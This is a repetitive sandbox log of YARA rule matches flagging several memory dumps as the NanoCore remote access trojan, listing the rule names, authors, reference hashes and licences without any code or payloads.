Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
